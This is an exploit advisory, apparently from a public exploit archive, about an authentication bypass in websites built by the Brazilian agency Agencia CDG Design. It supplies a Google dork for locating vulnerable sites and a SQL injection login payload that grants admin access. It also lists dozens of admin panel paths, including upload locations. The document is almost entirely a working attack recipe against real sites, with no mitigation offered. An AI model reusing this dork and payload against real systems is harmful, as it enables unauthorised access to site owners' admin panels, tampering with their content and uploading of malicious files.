####################################################################### # Exploit Title : Desenvolvido por Agencia CDG Design Brasil Improper Authentication # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 09/04/2019 # Vendor Homepage : agenciacdg.com.br # Software Information Link : agenciacdg.com.br/#tf-about # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : intext:Desenvolvimento por Agencia CDG Design site:br # Vulnerability Type : CWE-287 [ Improper Authentication ] CWE-592 [ Authentication Bypass Issues ] CWE-305 [ Authentication Bypass by Primary Weakness ] CWE-288 [ Authentication Bypass Using an Alternate Path or Channel ] CWE-302 [ Authentication Bypass by Assumed-Immutable Data ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos ####################################################################### # Impact : ********** * When an actor claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct. * The authentication algorithm is sound, but the implemented mechanism can be bypassed as the result of a separate weakness that is primary to the authentication error. * This product requires authentication, but the product has an alternate path or channel that does not require authentication. * The authentication scheme or implementation uses key data elements that are assumed to be immutable, but can be controlled or modified by the attacker. ####################################################################### # Payload : *********** Admin Username : Select => Admin or Administrator Admin Password : anything' OR 'x'='x You are in the Admin Panel - Congratulations :) # Useable Admin Control Panel Links Exploits : ****************************************** /admin/sistema/indexsistema.php /admin/sistema/bannerseimagens.php /admin/sistema/banners/[RANDOM-NUMBERS-LETTERS]. /admin/sistema/textosefrases.php /admin/sistema/dralilian.php /admin/sistema/portfolio.php /admin/sistema/alterartextoportfolio.php /admin/sistema/alterarimagensportfolio.php /admin/sistema/imagensgaleriasportfolio/[YOURFILENAME].gif .jpg .png /admin/sistema/depoimentos.php /admin/sistema/alterardepoimentos.php?id=[ID-NUMBER] /admin/sistema/videoclipes.php /admin/sistema/alterarvideoclipe.php?id=[ID-NUMBER] /admin/sistema/categorias.php /admin/sistema/alterarcategorias.php?id=[ID-NUMBER] /admin/sistema/servicos.php /admin/sistema/alterarservicos.php?id=[ID-NUMBER] /admin/sistema/tratamentos.php /admin/sistema/alterartratamentos.php /admin/sistema/tratamentos/[YOURFILENAME].gif .jpg .png /admin/sistema/marcashome.php /admin/sistema/marcasesubcategorias.php /admin/sistema/produtos.php /admin/sistema/alterarproduto.php /admin/sistema/lojasparceiras.php /admin/sistema/lojasdeaaz.php /admin/sistema/alterarlojasdeaaz.php /admin/sistema/paises.php /admin/sistema/alterarpaises.php?id=[ID-NUMBER] /admin/sistema/maisroteiros.ph /admin/sistema/alterarmaisroteiros.php?id=[ID-NUMBER] /admin/sistema/dicas.php /admin/sistema/alterardicas.php?id=[ID-NUMBER] /admin/sistema/sensibilidade.php /admin/sistema/alterarsensibilidade.php?id=[ID-NUMBER] /admin/sistema/agencias.php /admin/sistema/alteraragencias.php?id=[ID-NUMBER] /admin/sistema/editarmenudestinos.php /admin/sistema/editarpaginaagencias.php /admin/sistema/htmlecss.php ####################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #######################################################################